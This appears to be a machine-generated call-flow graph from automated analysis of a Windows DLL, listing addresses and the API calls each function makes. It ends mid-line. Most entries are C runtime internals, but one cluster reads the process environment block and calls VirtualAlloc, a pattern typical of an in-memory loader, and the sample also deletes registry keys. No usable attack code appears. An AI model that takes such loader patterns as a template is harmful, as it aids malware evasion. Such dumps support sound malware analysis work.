110144 6c3d83a8 __fseeki64 110144->110125 110146 6c3d8354 110145->110146 110147 6c3d8367 EnterCriticalSection 110145->110147 110222 6c3d355f 62 API calls 2 library calls 110146->110222 110147->110151 110188 6c3d83b3 110151->110188 110152 6c3d835c 110152->110151 110155 6c3d8014 110154->110155 110156 6c3d8028 110155->110156 110164 6c3d803f 110155->110164 110237 6c3d6fbc 62 API calls __getptd_noexit 110156->110237 110158 6c3d802d 110238 6c3d6f31 10 API calls __invalid_parameter_noinfo_noreturn 110158->110238 110160 6c3d8230 110243 6c3d6fbc 62 API calls __getptd_noexit 110160->110243 110161 6c3d8242 110234 6c3e46ba 110161->110234 110164->110160 110175 6c3d81dc 110164->110175 110239 6c3e4a44 72 API calls __fassign 110164->110239 110165 6c3d8235 110244 6c3d6f31 10 API calls __invalid_parameter_noinfo_noreturn 110165->110244 110167 6c3d24d5 110180 6c3d24f0 LeaveCriticalSection LeaveCriticalSection __fsopen 110167->110180 110169 6c3d81ab 110169->110160 110240 6c3e48de 81 API calls __mbsnbicmp_l 110169->110240 110171 6c3d81d5 110171->110175 110241 6c3e48de 81 API calls __mbsnbicmp_l 110171->110241 110173 6c3d81f4 110173->110175 110242 6c3e48de 81 API calls __mbsnbicmp_l 110173->110242 110175->110160 110175->110161 110176->110122 110177->110134 110178->110134 110179->110134 110180->110134 110182 6c3d7fd4 110181->110182 110183 6c3d7fe7 EnterCriticalSection 110181->110183 110184 6c3d7efd __mtinitlocknum 61 API calls 110182->110184 110183->110139 110185 6c3d7fda 110184->110185 110185->110183 110223 6c3d2e7d 62 API calls 3 library calls 110185->110223 110224 6c3d7ece LeaveCriticalSection 110188->110224 110190 6c3d83ba 110190->110144 110192 6c3d7f09 __fseeki64 110191->110192 110193 6c3d7f19 110192->110193 110194 6c3d7f31 110192->110194 110225 6c3db831 62 API calls 2 library calls 110193->110225 110196 6c3d7f2f 110194->110196 110197 6c3d7f3f __fseeki64 110194->110197 110196->110194 110228 6c3d7a7a 62 API calls _malloc 110196->110228 110197->110139 110199 6c3d7f1e 110226 6c3db682 62 API calls 7 library calls 110199->110226 110200 6c3d7f4a 110202 6c3d7f51 110200->110202 110203 6c3d7f60 110200->110203 110229 6c3d6fbc 62 API calls __getptd_noexit 110202->110229 110206 6c3d7fbf __lock 61 API calls 110203->110206 110204 6c3d7f25 110227 6c3d2b5e GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 110204->110227 110209 6c3d7f67 110206->110209 110208 6c3d7f56 110208->110197 110210 6c3d7f6f InitializeCriticalSectionAndSpinCount 110209->110210 110211 6c3d7f9a 110209->110211 110213 6c3d7f7f 110210->110213 110214 6c3d7f8b 110210->110214 110232 6c3d355f 62 API calls 2 library calls 110211->110232 110230 6c3d355f 62 API calls 2 library calls 110213->110230 110233 6c3d7fb6 LeaveCriticalSection _doexit 110214->110233 110217 6c3d7f85 110231 6c3d6fbc 62 API calls __getptd_noexit 110217->110231 110219->110139 110220->110139 110221->110143 110222->110152 110224->110190 110225->110199 110226->110204 110228->110200 110229->110208 110230->110217 110231->110214 110232->110214 110233->110208 110245 6c3e45c4 110234->110245 110236 6c3e46d5 110236->110167 110237->110158 110238->110167 110239->110169 110240->110171 110241->110173 110242->110175 110243->110165 110244->110167 110248 6c3e45d0 __fseeki64 110245->110248 110246 6c3e45e3 110365 6c3d6fbc 62 API calls __getptd_noexit 110246->110365 110248->110246 110250 6c3e4619 110248->110250 110249 6c3e45e8 110366 6c3d6f31 10 API calls __invalid_parameter_noinfo_noreturn 110249->110366 110256 6c3e3de2 110250->110256 110253 6c3e4633 110367 6c3e465a LeaveCriticalSection __unlock_fhandle 110253->110367 110255 6c3e45f2 __fseeki64 110255->110236 110257 6c3e3e09 110256->110257 110368 6c3f30ed 110257->110368 110260 6c3e4515 __fseeki64 110262 6c3e454c 110260->110262 110263 6c3e4537 110260->110263 110261 6c3e3e64 110393 6c3d6fcf 62 API calls __getptd_noexit 110261->110393 110267 6c3e3de2 __tsopen_nolock 116 API calls 110262->110267 110426 6c3d6fbc 62 API calls __getptd_noexit 110263->110426 110266 6c3e3e25 110266->110261 110270 6c3e3ebf 110266->110270 110364 6c3e4094 110266->110364 110271 6c3e4566 110267->110271 110268 6c3e3e69 110394 6c3d6fbc 62 API calls __getptd_noexit 110268->110394 110269 6c3e453c 110427 6c3d6f31 10 API calls __invalid_parameter_noinfo_noreturn 110269->110427 110276 6c3e3f46 110270->110276 110280 6c3e3f19 110270->110280 110428 6c3e458a LeaveCriticalSection __unlock_fhandle 110271->110428 110275 6c3e3e73 110395 6c3d6f31 10 API calls __invalid_parameter_noinfo_noreturn 110275->110395 110396 6c3d6fcf 62 API calls __getptd_noexit 110276->110396 110277 6c3e4578 110283 6c3e4547 __fseeki64 110277->110283 110429 6c3d6fbc 62 API calls __getptd_noexit 110277->110429 110375 6c3edd1c 110280->110375 110281 6c3e3f4b 110397 6c3d6fbc 62 API calls __getptd_noexit 110281->110397 110283->110253 110285 6c3e3f55 110398 6c3d6f31 10 API calls __invalid_parameter_noinfo_noreturn 110285->110398 110288 6c3e3fd7 110290 6c3e3fe0 110288->110290 110291 6c3e4001 CreateFileA 110288->110291 110289 6c3e3e7d 110289->110253 110399 6c3d6fcf 62 API calls __getptd_noexit 110290->110399 110293 6c3e409e GetFileType 110291->110293 110294 6c3e402e 110291->110294 110296 6c3e40ef 110293->110296 110297 6c3e40ab GetLastError 110293->110297 110298 6c3e403c 110294->110298 110299 6c3e4067 GetLastError 110294->110299 110295 6c3e3fe5 110400 6c3d6fbc 62 API calls __getptd_noexit 110295->110400 110406 6c3edae6 63 API calls 2 library calls 110296->110406 110404 6c3d6fe2 62 API calls 3 library calls 110297->110404 110298->110299 110302 6c3e4042 CreateFileA 110298->110302 110402 6c3d6fe2 62 API calls 3 library calls 110299->110402 110302->110293 110302->110299 110304 6c3e3fef 110401 6c3d6fbc 62 API calls __getptd_noexit 110304->110401 110305 6c3e40d4 CloseHandle 110307 6c3e40e2 110305->110307 110312 6c3e408e 110305->110312 110405 6c3d6fbc 62 API calls __getptd_noexit 110307->110405 110311 6c3e410d 110313 6c3e4163 110311->110313 110314 6c3e4401 110311->110314 110319 6c3e41d2 110311->110319 110403 6c3d6fbc 62 API calls __getptd_noexit 110312->110403 110407 6c3dee2a 64 API calls 3 library calls 110313->110407 110315 6c3e4323 110314->110315 110314->110364 110315->110314 110317 6c3e448b CloseHandle CreateFileA 110315->110317 110315->110364 110320 6c3e44b8 GetLastError 110317->110320 110317->110364 110318 6c3e416d 110321 6c3e418f 110318->110321 110322 6c3e4176 110318->110322 110319->110314 110330 6c3e432c 110319->110330 110338 6c3e427c 110319->110338 110423 6c3d6fe2 62 API calls 3 library calls 110320->110423 110410 6c3de68d 72 API calls 6 library calls 110321->110410 110408 6c3d6fcf 62 API calls __getptd_noexit 110322->110408 110326 6c3e44c4 110424 6c3edb67 63 API calls 2 library calls 110326->110424 110328 6c3e41a0 110329 6c3e41b9 110328->110329 110411 6c3f2d37 96 API calls 6 library calls 110328->110411 110363 6c3e4183 110329->110363 110412 6c3dee2a 64 API calls 3 library calls 110329->110412 110330->110314 110335 6c3e4349 110330->110335 110340 6c3e42a0 110330->110340 110416 6c3e0403 64 API calls 3 library calls 110335->110416 110336 6c3e417b 110336->110319 110336->110363 110338->110314 110338->110340 110341 6c3e42cb 110338->110341 110362 6c3e42e7 110338->110362 110339 6c3e4354 110339->110340 110343 6c3e435f 110339->110343 110340->110314 110340->110363 110422 6c3e1742 93 API calls 6 library calls 110340->110422 110413 6c3e0403 64 API calls 3 library calls 110341->110413 110417 6c3e0403 64 API calls 3 library calls 110343->110417 110345 6c3e438a 110418 6c3da7e8 65 API calls 3 library calls 110345->110418 110346 6c3e43a4 110348 6c3e43c6 110346->110348 110349 6c3e43ab 110346->110349 110347 6c3e4301 110347->110315 110347->110345 110347->110346 110347->110348 110347->110363 110421 6c3dee2a 64 API calls 3 library calls 110348->110421 110420 6c3dee2a 64 API calls 3 library calls 110349->110420 110350 6c3e42d6 110350->110340 110355 6c3e42dd 110350->110355 110414 6c3e0403 64 API calls 3 library calls 110355->110414 110356 6c3e4369 110356->110314 110356->110363 110357 6c3e4391 110419 6c3d6fbc 62 API calls __getptd_noexit 110357->110419 110358 6c3e43b5 110358->110315 110358->110363 110362->110363 110415 6c3de68d 72 API calls 6 library calls 110362->110415 110409 6c3da7e8 65 API calls 3 library calls 110363->110409 110425 6c3d6ec5 10 API calls __call_reportfault 110364->110425 110365->110249 110366->110255 110367->110255 110369 6c3f310e 110368->110369 110370 6c3f30f9 110368->110370 110369->110266 110371 6c3d6fbc __input_s_l 62 API calls 110370->110371 110372 6c3f30fe 110371->110372 110373 6c3d6f31 __input_s_l 10 API calls 110372->110373 110374 6c3f3109 110373->110374 110374->110266 110376 6c3edd28 __fseeki64 110375->110376 110377 6c3d7efd __mtinitlocknum 62 API calls 110376->110377 110378 6c3edd38 110377->110378 110379 6c3d7fbf __lock 62 API calls 110378->110379 110380 6c3edd3d __fseeki64 110378->110380 110384 6c3edd4c 110379->110384 110380->110288 110381 6c3edeac __alloc_osfhnd LeaveCriticalSection 110381->110380 110382 6c3ede24 110383 6c3d7abf __calloc_crt 62 API calls 110382->110383 110387 6c3ede2d 110383->110387 110384->110382 110385 6c3eddcc EnterCriticalSection 110384->110385 110386 6c3d7fbf __lock 62 API calls 110384->110386 110389 6c3edda2 InitializeCriticalSectionAndSpinCount 110384->110389 110391 6c3eddee __alloc_osfhnd LeaveCriticalSection 110384->110391 110392 6c3ede8e 110384->110392 110385->110384 110388 6c3edddc LeaveCriticalSection 110385->110388 110386->110384 110390 6c3edc56 ___lock_fhandle 64 API calls 110387->110390 110387->110392 110388->110384 110389->110384 110390->110392 110391->110384 110392->110381 110393->110268 110394->110275 110395->110289 110396->110281 110397->110285 110398->110289 110399->110295 110400->110304 110401->110289 110402->110312 110403->110364 110404->110305 110405->110312 110406->110311 110407->110318 110408->110336 110409->110312 110410->110328 110411->110329 110412->110336 110413->110350 110414->110362 110415->110347 110416->110339 110417->110356 110418->110357 110419->110364 110420->110358 110421->110356 110422->110340 110423->110326 110424->110364 110425->110260 110426->110269 110427->110283 110428->110277 110429->110283 110430->110106 110431->110110 110432->110109 110433->110110 110434->110027 110435->110028 110437 6c397287 110436->110437 110442 6c397273 110436->110442 110478 6c397969 146 API calls __input_s_l 110437->110478 110440 6c397282 110440->110058 110440->110083 110442->110440 110443 6c39727a 110442->110443 110464 6c397458 110442->110464 110443->110440 110479 6c393d23 98 API calls 2 library calls 110443->110479 110444->110037 110445->110040 110446->110040 110447->110049 110448->110052 110449->110044 110450->110057 110451->110045 110452->110054 110453->110064 110454->110062 110455->110069 110456->110065 110457->110073 110458->110084 110459->110074 110460->110085 110461->110085 110462->110085 110463->110083 110465 6c3974c5 110464->110465 110467 6c3975ca 110465->110467 110480 6c397cc1 110465->110480 110468 6c397cc1 145 API calls 110467->110468 110470 6c39766f 110467->110470 110477 6c3976b9 110467->110477 110473 6c3976b1 110468->110473 110469 6c397cc1 145 API calls 110476 6c397788 110469->110476 110470->110469 110470->110476 110470->110477 110471 6c3d1f75 __input_s_l 5 API calls 110472 6c397967 110471->110472 110472->110443 110473->110470 110473->110477 110512 6c39157b 98 API calls 2 library calls 110473->110512 110474 6c397cc1 145 API calls 110474->110477 110476->110474 110476->110477 110477->110471 110477->110477 110478->110442 110479->110440 110483 6c397d11 110480->110483 110481 6c397e10 110482 6c397f8b 110481->110482 110513 6c3a7866 110481->110513 110486 6c397fbd 110482->110486 110495 6c398237 __cftoa_l 110482->110495 110511 6c397d86 110482->110511 110483->110481 110483->110511 110525 6c3d28b7 98 API calls 5 library calls 110483->110525 110505 6c398010 110486->110505 110529 6c39bdd0 113 API calls 7 library calls 110486->110529 110487 6c397de6 110488 6c397dfb 110487->110488 110526 6c3d355f 62 API calls 2 library calls 110487->110526 110488->110481 110527 6c3d355f 62 API calls 2 library calls 110488->110527 110489 6c3d1f75 __input_s_l 5 API calls 110492 6c3983ba 110489->110492 110492->110467 110494 6c397ff4 110494->110505 110494->110511 110530 6c39d28e 5 API calls __input_s_l 110494->110530 110497 6c3982bd 110495->110497 110498 6c39826a 110495->110498 110495->110511 110500 6c3d1f84 _sprintf 98 API calls 110497->110500 110499 6c3d1f84 _sprintf 98 API calls 110498->110499 110502 6c3982b8 110499->110502 110500->110502 110501 6c3983bc 144 API calls 110508 6c397e3c __mbschr_l __cftoa_l _strncmp 110501->110508 110504 6c3d1f84 _sprintf 98 API calls 110502->110504 110503 6c397f78 110528 6c39c4dc 122 API calls 13 library calls 110503->110528 110504->110511 110507 6c397cc1 145 API calls 110505->110507 110505->110511 110507->110511 110508->110501 110508->110503 110509 6c3a8f22 62 API calls 110508->110509 110510 6c3d1f84 _sprintf 98 API calls 110508->110510 110508->110511 110509->110508 110510->110508 110511->110489 110512->110470 110515 6c3a7895 110513->110515 110516 6c3a7877 110513->110516 110514 6c3a789c 110517 6c3a78ca 110514->110517 110518 6c3a78aa 110514->110518 110531 6c3886d4 62 API calls __floor_pentium4 110515->110531 110516->110514 110516->110515 110522 6c3d1f84 _sprintf 98 API calls 110517->110522 110520 6c3d1f84 _sprintf 98 API calls 110518->110520 110521 6c3a78c2 110520->110521 110521->110508 110522->110521 110523 6c3a7948 110524 6c3d1f84 _sprintf 98 API calls 110523->110524 110524->110521 110525->110487 110526->110488 110527->110481 110528->110482 110529->110494 110530->110505 110531->110523 110532->110004 110533 2eb05b8 GetPEB 110534 2eb05e7 110533->110534 110535 2eb070e 110534->110535 110536 2eb071b VirtualAlloc 110534->110536 110539 2eb08a9 110535->110539 110540 2eb08f2 967 API calls 110535->110540 110537 2eb0747 VirtualAlloc 110536->110537 110537->110535 110540->110535 110541 6c351112 110542 6c3d24fa 139 API calls 110541->110542 110543 6c351118 110542->110543 110544 6c3d1f84 _sprintf 98 API calls 110543->110544 110549 6c351144 __stbuf 110543->110549 110545 6c351138 110544->110545 110579 6c371814 99 API calls 2 library calls 110545->110579 110548 6c3511a6 110581 6c3714fc 112 API calls 4 library calls 110548->110581 110549->110548 110557 6c3511ca _memset 110549->110557 110580 6c3714fc 112 API calls 4 library calls 110549->110580 110552 6c3511b0 110553 6c3511c0 110552->110553 110582 6c3714fc 112 API calls 4 library calls 110552->110582 110583 6c3714fc 112 API calls 4 library calls 110553->110583 110558 6c351433 110557->110558 110562 6c3714fc 112 API calls 110557->110562 110576 6c371ad3 113 API calls 110557->110576 110578 6c37070e 103 API calls 110557->110578 110584 6c3514a4 146 API calls 3 library calls 110557->110584 110585 6c35f780 164 API calls 110557->110585 110586 6c357259 62 API calls __floor_pentium4 110557->110586 110587 6c357313 62 API calls 110557->110587 110588 6c366e7c 147 API calls 3 library calls 110557->110588 110589 6c3d174a 257 API calls 110557->110589 110590 6c365698 224 API calls 110557->110590 110560 6c351467 110558->110560 110591 6c3714fc 112 API calls 4 library calls 110558->110591 110568 6c35147a __stbuf 110560->110568 110594 6c374c0a 146 API calls 5 library calls 110560->110594 110562->110557 110563 6c35144d 110565 6c35145d 110563->110565 110592 6c3714fc 112 API calls 4 library calls 110563->110592 110593 6c3714fc 112 API calls 4 library calls 110565->110593 110567 6c351491 110573 6c3d1f75 __input_s_l 5 API calls 110567->110573 110568->110567 110595 6c3d28b7 98 API calls 5 library calls 110568->110595 110574 6c3514a0 110573->110574 110576->110557 110578->110557 110579->110549 110580->110548 110581->110552 110582->110553 110583->110557 110584->110557 110585->110557 110586->110557 110587->110557 110588->110557 110589->110557 110590->110557 110591->110563 110592->110565 110593->110560 110594->110568 110595->110567 110596 6c3d5d24 110597 6c3d5d2f 110596->110597 110598 6c3d5d34 110596->110598 110610 6c3e0cc4 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 110597->110610 110602 6c3d5c2e 110598->110602 110601 6c3d5d42 110603 6c3d5c3a __fseeki64 110602->110603 110607 6c3d5cd7 __fseeki64 110603->110607 110608 6c3d5c87 ___DllMainCRTStartup 110603->110608 110611 6c3d5aca 110603->110611 110605 6c3d5cb7 110606 6c3d5aca ___DllMainCRTStartup 140 API calls 110605->110606 110605->110607 110606->110607 110607->110601 110608->110605 110608->110607 110609 6c3d5aca ___DllMainCRTStartup 140 API calls 110608->110609 110609->110605 110610->110598 110612 6c3d5ad6 __fseeki64 110611->110612 110613 6c3d5ade 110612->110613 110614 6c3d5b58 110612->110614 110661 6c3de3bd HeapCreate 110613->110661 110616 6c3d5b5e 110614->110616 110617 6c3d5bb9 110614->110617 110623 6c3d5b7c 110616->110623 110630 6c3d5ae7 __fseeki64 110616->110630 110681 6c3d2e5f 62 API calls _doexit 110616->110681 110618 6c3d5bbe 110617->110618 110619 6c3d5c17 110617->110619 110662 6c3d8faa TlsGetValue 110618->110662 110619->110630 110687 6c3d92ae 74 API calls __freefls@4 110619->110687 110620 6c3d5ae3 110621 6c3d5aee 110620->110621 110620->110630 110672 6c3d9328 79 API calls 5 library calls 110621->110672 110624 6c3d5b90 110623->110624 110682 6c3d779b 63 API calls _free 110623->110682 110684 6c3d5ba3 TlsFree __mtterm 110624->110684 110629 6c3d5af3 __RTC_Initialize 110634 6c3d5af7 110629->110634 110640 6c3d5b03 GetCommandLineA 110629->110640 110630->110608 110673 6c3de3db HeapDestroy 110634->110673 110635 6c3d5b86 110683 6c3d8ffb TlsFree 110635->110683 110638 6c3d5afc 110638->110630 110674 6c3e0a9d 67 API calls 2 library calls 110640->110674 110643 6c3d5b13 110675 6c3d7556 69 API calls __calloc_crt 110643->110675 110646 6c3d5c0b 110686 6c3d355f 62 API calls 2 library calls 110646->110686 110647 6c3d5bf4 110685 6c3d9038 62 API calls 4 library calls 110647->110685 110648 6c3d5b1d 110651 6c3d5b21 110648->110651 110677 6c3e09e2 91 API calls 3 library calls 110648->110677 110676 6c3d8ffb TlsFree 110651->110676 110652 6c3d5bfb GetCurrentThreadId 110652->110630 110655 6c3d5b2d 110656 6c3d5b41 110655->110656 110678 6c3e075d 90 API calls 6 library calls 110655->110678 110656->110638 110680 6c3d779b 63 API calls _free 110656->110680 110659 6c3d5b36 110659->110656 110679 6c3d2c5c 73 API calls 4 library calls 110659->110679 110661->110620 110663 6c3d8fbf TlsSetValue 110662->110663 110664 6c3d5bc3 110662->110664 110663->110664 110666 6c3d7abf 110664->110666 110668 6c3d7ac8 110666->110668 110669 6c3d5bcf 110668->110669 110670 6c3d7ae6 Sleep 110668->110670 110688 6c3e05ab 110668->110688 110669->110630 110669->110646 110669->110647 110671 6c3d7afb 110670->110671 110671->110668 110671->110669 110672->110629 110673->110638 110674->110643 110675->110648 110677->110655 110678->110659 110679->110656 110680->110651 110681->110623 110682->110635 110684->110630 110685->110652 110686->110630 110687->110630 110689 6c3e05b7 110688->110689 110693 6c3e05d2 _malloc 110688->110693 110690 6c3e05c3 110689->110690 110689->110693 110696 6c3d6fbc 62 API calls __getptd_noexit 110690->110696 110692 6c3e05e5 RtlAllocateHeap 110692->110693 110695 6c3e060c 110692->110695 110693->110692 110693->110695 110694 6c3e05c8 110694->110668 110695->110668 110696->110694 110697 6c396993 110698 6c396998 110697->110698 110699 6c3d1f75 __input_s_l 5 API calls 110698->110699 110700 6c396ab9 110699->110700 110701 6c35b1de 110702 6c35b1ed 110701->110702 110703 6c3d1f84 _sprintf 98 API calls 110702->110703 110704 6c35b1fa 110703->110704 110705 6c3d1f84 _sprintf 98 API calls 110704->110705 110707 6c35b21d 110705->110707 110723 6c3d330e 110707->110723 110708 6c35b275 110709 6c3d330e __wgetenv 95 API calls 110708->110709 110714 6c35b282 110709->110714 110710 6c35b250 110710->110708 110713 6c3d1f84 _sprintf 98 API calls 110710->110713 110711 6c35b2a7 110712 6c3d330e __wgetenv 95 API calls 110711->110712 110717 6c35b2b0 110712->110717 110713->110708 110714->110711 110716 6c3d1f84 _sprintf 98 API calls 110714->110716 110715 6c35b2d5 110718 6c3d1f84 _sprintf 98 API calls 110715->110718 110716->110711 110717->110715 110720 6c3d1f84 _sprintf 98 API calls 110717->110720 110719 6c35b2f7 110718->110719 110721 6c3d1f75 __input_s_l 5 API calls 110719->110721 110720->110715 110722 6c35b31c 110721->110722 110724 6c3d331a __fseeki64 _strnlen 110723->110724 110725 6c3d3326 110724->110725 110729 6c3d3352 110724->110729 110736 6c3d6fbc 62 API calls __getptd_noexit 110725->110736 110727 6c3d332b 110737 6c3d6f31 10 API calls __invalid_parameter_noinfo_noreturn 110727->110737 110730 6c3d7fbf __lock 62 API calls 110729->110730 110731 6c3d3359 110730->110731 110738 6c3d3160 95 API calls 3 library calls 110731->110738 110733 6c3d3336 __fseeki64 110733->110710 110734 6c3d3366 110739 6c3d337f LeaveCriticalSection _doexit 110734->110739 110736->110727 110737->110733 110738->110734 110739->110733 110740 6c395835 110743 6c395840 110740->110743 110741 6c3d1f75 __input_s_l 5 API calls 110742 6c396653 110741->110742 110744 6c395950 110743->110744 110745 6c395b85 110743->110745 110775 6c39586f 110743->110775 110762 6c395963 110744->110762 110811 6c397969 146 API calls __input_s_l 110744->110811 110746 6c395b8f 110745->110746 110747 6c395ce6 110745->110747 110749 6c395b9b 110746->110749 110750 6c396597 110746->110750 110747->110750 110768 6c395d3b 110747->110768 110753 6c395bde 110749->110753 110754 6c395c1a 110749->110754 110814 6c3a1275 146 API calls 2 library calls 110749->110814 110750->110775 110835 6c396ed9 146 API calls 110750->110835 110751 6c397458 145 API calls 110766 6c39596a 110751->110766 110753->110754 110815 6c39045b 146 API calls 2 library calls 110753->110815 110758 6c397458 145 API calls 110754->110758 110761 6c395c8f 110754->110761 110757 6c395b36 110757->110775 110813 6c393d23 98 API calls 2 library calls 110757->110813 110758->110761 110760 6c395c05 110760->110754 110763 6c395cd6 110760->110763 110761->110775 110816 6c39bacb 145 API calls __input_s_l 110761->110816 110762->110751 110762->110766 110762->110775 110817 6c3913bf 98 API calls 2 library calls 110763->110817 110766->110775 110812 6c39157b 98 API calls 2 library calls 110766->110812 110769 6c395e5f 110768->110769 110770 6c395d44 110768->110770 110771 6c395e68 110769->110771 110772 6c395f53 110769->110772 110770->110775 110818 6c392d37 98 API calls 2 library calls 110770->110818 110771->110775 110821 6c392f12 98 API calls 2 library calls 110771->110821 110773 6c395f58 110772->110773 110774 6c395fc5 110772->110774 110773->110775 110824 6c39d768 146 API calls 2 library calls 110773->110824 110777 6c395fca 110774->110777 110778 6c39600d 110774->110778 110775->110741 110777->110775 110825 6c39d768 146 API calls 2 library calls 110777->110825 110778->110775 110783 6c39607f 110778->110783 110787 6c39604d 110778->110787 110779 6c395d7f 110779->110775 110819 6c392d37 98 API calls 2 library calls 110779->110819 110782 6c395ea1 110782->110775 110822 6c392f12 98 API calls 2 library calls 110782->110822 110783->110775 110788 6c3d1f84 _sprintf 98 API calls 110783->110788 110789 6c3960fb 110783->110789 110796 6c396189 110783->110796 110807 6c3963fd 110783->110807 110826 6c39e5a0 145 API calls 2 library calls 110787->110826 110788->110783 110827 6c39e5a0 145 API calls 2 library calls 110789->110827 110790 6c395da8 110790->110775 110820 6c39bc0b 145 API calls __input_s_l 110790->110820 110792 6c395ecc 110792->110775 110823 6c39bc0b 145 API calls __input_s_l 110792->110823 110797 6c39619d 110796->110797 110798 6c3962ee 110796->110798 110828 6c396ed9 146 API calls 110797->110828 110798->110775 110801 6c3d1f84 _sprintf 98 API calls 110798->110801 110801->110775 110802 6c3961c7 110829 6c394554 145 API calls 110802->110829 110804 6c397cc1 145 API calls 110804->110807 110807->110775 110807->110804 110833 6c398689 146 API calls __input_s_l 110807->110833 110834 6c396ed9 146 API calls 110807->110834 110809 6c3961fa 110809->110775 110830 6c39a095 146 API calls __input_s_l 110809->110830 110831 6c396ed9 146 API calls 110809->110831 110832 6c394554 145 API calls 110809->110832 110811->110762 110812->110757 110813->110775 110814->110753 110815->110760 110816->110775 110817->110775 110818->110779 110819->110790 110820->110775 110821->110782 110822->110792 110823->110775 110824->110775 110825->110775 110826->110775 110827->110775 110828->110802 110829->110809 110830->110809 110831->110809 110832->110809 110833->110807 110834->110807 110835->110775 110836 6c353ffb 110837 6c35400a __EH_prolog3_catch_GS 110836->110837 110866 6c353021 110837->110866 110841 6c35401b 110843 6c35407b 110841->110843 111038 6c3714fc 112 API calls 4 library calls 110841->111038 110895 6c371472 110843->110895 110846 6c354094 110909 6c3e0ff1 110846->110909 110847 6c35411f 111037 6c3f7385 5 API calls __input_s_l 110847->111037 110850 6c354126 110851 6c3540af _memset 110852 6c3540c9 GetModuleFileNameA 110851->110852 110853 6c354114 110852->110853 110854 6c3540ec MessageBoxA 110852->110854 111015 6c35338c 110853->111015 110912 6c3b2a72 SHDeleteKeyA 110854->110912 110858 6c354119 110867 6c35303b _memset __stbuf 110866->110867 110867->110867 110868 6c3530c7 GetModuleFileNameA 110867->110868 110869 6c35313b 110868->110869 110870 6c3d1f75 __input_s_l 5 API calls 110869->110870 110871 6c353175 110870->110871 110872 6c374afa 110871->110872 110873 6c374b26 110872->110873 110874 6c374b2e 110872->110874 111039 6c3747b5 110873->111039 110890 6c374b82 110874->110890 111060 6c3d2a1f 77 API calls 5 library calls 110874->111060 110877 6c374b48 111061 6c3d2220 64 API calls 4 library calls 110877->111061 110879 6c3d1f75 __input_s_l 5 API calls 110881 6c374c05 110879->110881 110880 6c374b54 110882 6c374b5c 110880->110882 110891 6c374b84 110880->110891 110881->110841 110884 6c3d1f84 _sprintf 98 API calls 110882->110884 110885 6c374b74 110884->110885 111062 6c3717c6 99 API calls 2 library calls 110885->111062 110886 6c374b9d 111065 6c3d3b76 62 API calls __input_s_l 110886->111065 110890->110879 110891->110886 111063 6c3d3b76 62 API calls __input_s_l 110891->111063 111064 6c3d2a1f 77 API calls 5 library calls 110891->111064 110893 6c374ba3 110893->110890 111066 6c3d3b76 62 API calls __input_s_l 110893->111066 111067 6c3d2a1f 77 API calls 5 library calls 110893->111067 110896 6c3714f0 110895->110896 110900 6c37148b __stbuf 110895->110900 110897 6c3d1f75 __input_s_l 5 API calls 110896->110897 110899 6c354081 110897->110899 110898 6c3714cc 110898->110896 110901 6c3d1f84 _sprintf 98 API calls 110898->110901 110899->110846 110899->110847 110900->110898 111070 6c371ad3 113 API calls 3 library calls 110900->111070 110903 6c3714e5 110901->110903 111072 6c3714fc 112 API calls 4 library calls 110903->111072 110904 6c3714a9 110906 6c3d1f84 _sprintf 98 API calls 110904->110906 110907 6c3714c1 110906->110907 111071 6c3714fc 112 API calls 4 library calls 110907->111071 110910 6c3e101a 110909->110910 110911 6c3e1026 KiUserExceptionDispatcher 110909->110911 110910->110911 110911->110851 110913 6c3b2a8b SHDeleteKeyA 110912->110913 110914 6c3b2a97 110912->110914 110913->110914 110915 6c3b2aa5 110913->110915 111073 6c371814 99 API calls 2 library calls 110914->111073 110917 6c3540ff 110915->110917 111074 6c371778 99 API calls 2 library calls 110915->111074 110919 6c365fe6 110917->110919 110920 6c366012 110919->110920 110921 6c365fff 110919->110921 111076 6c3714fc 112 API calls 4 library calls 110920->111076 110921->110920 110922 6c366008 110921->110922 111075 6c373bf3 113 API calls 110922->111075 110925 6c36600d 110927 6c3d1f75 __input_s_l 5 API calls 110925->110927 110929 6c354104 110927->110929 110928 6c36608c 111079 6c3714fc 112 API calls 4 library calls 110928->111079 110961 6c3665f4 110929->110961 110931 6c371ad3 113 API calls 110934 6c36601f 110931->110934 110932 6c3d1f84 _sprintf 98 API calls 110932->110934 110934->110928 110934->110931 110934->110932 111077 6c37173a 112 API calls 110934->111077 111078 6c3714fc 112 API calls 4 library calls 110934->111078 110935 6c36612c 111082 6c3714fc 112 API calls 4 library calls 110935->111082 110938 6c371ad3 113 API calls 110946 6c366096 110938->110946 110939 6c3661ab 110941 6c366247 110939->110941 111085 6c3714fc 112 API calls 4 library calls 110939->111085 111088 6c37173a 112 API calls 110941->111088 110944 6c3d1f84 _sprintf 98 API calls 110944->110946 110945 6c371ad3 113 API calls 110952 6c366136 110945->110952 110946->110935 110946->110938 110946->110944 111080 6c37173a 112 API calls 110946->111080 111081 6c3714fc 112 API calls 4 library calls 110946->111081 110949 6c3d1f84 _sprintf 98 API calls 110949->110952 110950 6c3661c2 110950->110941 110954 6c3d1f84 _sprintf 98 API calls 110950->110954 110958 6c371ad3 113 API calls 110950->110958 111086 6c37173a 112 API calls 110950->111086 111087 6c3714fc 112 API calls 4 library calls 110950->111087 110952->110939 110952->110945 110952->110949 111083 6c37173a 112 API calls 110952->111083 111084 6c3714fc 112 API calls 4 library calls 110952->111084 110953 6c371ad3 113 API calls 110959 6c36624e 110953->110959 110954->110950 110956 6c3d1f84 98 API calls _sprintf 110956->110959 110957 6c37173a 112 API calls 110957->110959 110958->110950 110959->110925 110959->110953 110959->110956 110959->110957 110960 6c3714fc 112 API calls 110959->110960 110960->110959 110969 6c366632 _memset 110961->110969 110962 6c366ada 111089 6c361ec9 110962->111089 110963 6c366913 110967 6c3d1f84 _sprintf 98 API calls 110963->110967 110964 6c366a95 110964->110962 111128 6c37070e 103 API calls 110964->111128 110970 6c366929 110967->110970 110969->110963 110969->110964 111117 6c37070e 103 API calls 110969->111117 111118 6c370e43 62 API calls 110969->111118 111119 6c373a39 113 API calls 2 library calls 110969->111119 111120 6c371ad3 113 API calls 3 library calls 110969->111120 111121 6c3714fc 112 API calls 4 library calls 110970->111121 110973 6c3d1f75 __input_s_l 5 API calls 110975 6c354109 110973->110975 110996 6c366b34 110975->110996 110976 6c366938 111122 6c367763 113 API calls 2 library calls 110976->111122 110980 6c366990 111123 6c371ad3 113 API calls 3 library calls 110980->111123 110982 6c3669b9 110983 6c3d1f84 _sprintf 98 API calls 110982->110983 110984 6c366a1f 110983->110984 111124 